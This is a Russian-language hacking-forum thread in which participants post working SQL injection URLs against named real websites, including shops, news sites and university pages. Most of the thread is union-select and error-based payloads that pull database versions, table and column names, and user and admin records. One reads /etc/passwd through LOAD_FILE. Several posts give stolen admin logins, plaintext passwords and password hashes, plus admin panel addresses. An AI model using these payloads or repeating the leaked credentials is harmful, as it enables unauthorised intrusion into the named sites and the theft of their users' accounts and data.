SQL Инъекции

Информационный ресурс

Code:

http://www.rocit.ru/news/ITshownews.php3?id=-19060+union+select+1,2,3,4,5,6,7,convert(concat(database(),char(58),user(),version()),char),9,10/*

 

iran.ru

Code:

http://iran.ru/rus/print_news.php?news_id=-36994+union+select+1,2,convert(concat(database(),char(58),user(),version()),char),4,5,6,7,8/*

 

beermarket.ru
Инет-магаз

 

Наша цель :

Code:

www.rsi.ru

Имя базы:

Code:

http://www.rsi.ru/News/news.asp?id=2354+or+2354=(select%20db_name())--

Наш юзверь:

Code:

http://www.rsi.ru/News/news.asp?id=2354+or+2354=(select%20system_user)--

Версия:

Code:

http://www.rsi.ru/News/news.asp?id=2354+or+2354=@@version--

перебераем таблицы:

Code:

http://www.rsi.ru/News/news.asp?id=2354+or+2354=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('T_LastDat','ORDERS','ClientShort','cnf_greenwood','cnf_rsi','cnf_rsi_parts','cnf_rsi_s','cnf_rsi_users'))--

Теперь перебераем колонки :

Code:

http://www.rsi.ru/News/news.asp?id=2354+or+2354=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='cnf_rsi_users'+AND+COLUMN_NAME+NOT+IN+('user','u_id','user_nm','user_bd'))--

 

Code:

http://www.zondmarket.ru/?p=8&t=2&idst=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7/*
http://www.zondmarket.ru/?p=8&t=2&idst=-1+union+select+1,2,concat(login,char(58),pass,char(58),name,char(58),prof,char(58),firma,char(58),production,char(58),email,char(58),adress,char(58),telefon),4,5,6,7+from+registration+limit+10,1/*

 

Code:

http://www.idc.ul.ie/people.php?id=-42%20UNION%20SELECT%201,2,3,user,password,6,7,8,9,10,11,12+from+mysql.user/*
http://www.idc.ul.ie/people.php?id=-42%20UNION%20SELECT%201,2,3,4,LOAD_FILE(0x2f6574632f706173737764),6,7,8,9,10,11,12/*

Code:

http://www.socs.nuigalway.ie/list_socs/viewSoc.php?id=-47+union+select+1,2/*

глухарь =\

 

Code:

http://exploits.elemneo.pl/index.php?download=-1+union+select+1,version(),3,4,5,6/*

скуля в базе сплойтов))

 

Зараннее говорю - вы не подумайте, я в гугле набирал сайт занкомств!!! =)))
Кстати, обратите внимание на гламурную ссылку на главной странице - admin...

Решил чуток расписать...


Обращаем внимание на то, что при $link = 2-1 картинка снизу соответствует $link = 1.

Подбираем кол - во столбцов

Смотрим версию.

Так как 5 - ая версия, можно посмотреть таблицы, колонки.

Конечно можно порадоваться таблице users, в которой записаны логины и пассы в чистом виде, но админа там нет, а кому нужны акки на этом сайте?

Поэтому идем в таблицу adminip и перебираем там колонки...

Бамс! 1 - ая колонкка и сразу pass. Ну что ж...

Админка наша, победа нафиг! =D
admin:q1a2z3x4s5w6e7d8c9v0 ( http://www.freelove.in.ua/admin.php )


Ps писанины стокоо...))

 

самописные форумы-это плохо

пойду дальше

 

Code:

http://www.optimed.ru/index.php?area=prod&part=-1+union+select+1,2,version(),4,5,6,7,8/*

Code:

http://www.optimed.ru/admin/

мб админская таблица и есть, но я ее не нашел)

 

ух ты валуехост

позже: хз не нашёл больше, спать надо

 

не подобрал


уже голова не варит

 

Академия онанизма и мастурбации

Code:

http://[B][COLOR=YellowGreen]onanistov.net[/COLOR][/B]/kb.php?mode=cat&cat=-3+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(username,char(58),user_password),0),0),3,4,5,66,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20phpbb_users+limit+1,1/*

Thoral:cd0d2dcda0f8df2960f53e8dd699fdab

Kamaz привет

 

Камаз

 

Вывод в тайтле. 5 версия, но все прямые запросы с "from" блочит. Гифровать не пробовал(

Пасы не нашел

 

походу пассы в 'pass', в остальных случаях выдает ошибку..

Code:

http://nfs.com.ua/file_details.phtml?id=341+union+select+1,2,3,4,5,6,7,concat(name,0x3a,pass),9,10,11,12,13,14,15,16,17,18,19,20+from+members+limit+5,1/*

либо логин в другой, либо справа не та форма авторизации..
странно, почему у всех 'name' префикс USSRx и почему все 'pass' 4хзначные..

 

Code:

http://www.christymoore.com/lyrics_tabs_detail.php?id=-18%20UNION%20SELECT%201,2,table_name,4,5,6+from+INFORMATION_SCHEMA.TABLES+limit+25,1/*
http://www.christymoore.com/lyrics_tabs_detail.php?id=-18%20UNION%20SELECT%201,2,concat(username,0x3a,password),4,5,6+from+admin/*

www.christymoore.com/admin
name: christymoore
pass:cmbb

Code:

http://www.cttc.ie/memberdetails.php?id=-27+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(email,0x71),0x71),4,5,6,7,8,9,10+from+members/*

таблицы не нашел=\

 

таблица юзер

Code:

http://avia-model.ru/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,name,username,passwd,email)+from+user/*

шоп
имя:логин:хеш:мыло
таблица админ

Code:

http://avia-model.ru/show_cat2.php?grid=-1+union+select+concat(username,0x3a,password)+from+admin/*

пароли все в mysql4
пока не расшифровал =\

 

PHP:

Первый скуль.    http://projectors.toshiba.com.ru/news/list/show/?newsid=-27+union+select+1,2,database(),4,concat(user(),0x3a,version()),6,7,8,9,10,11,12,   14/*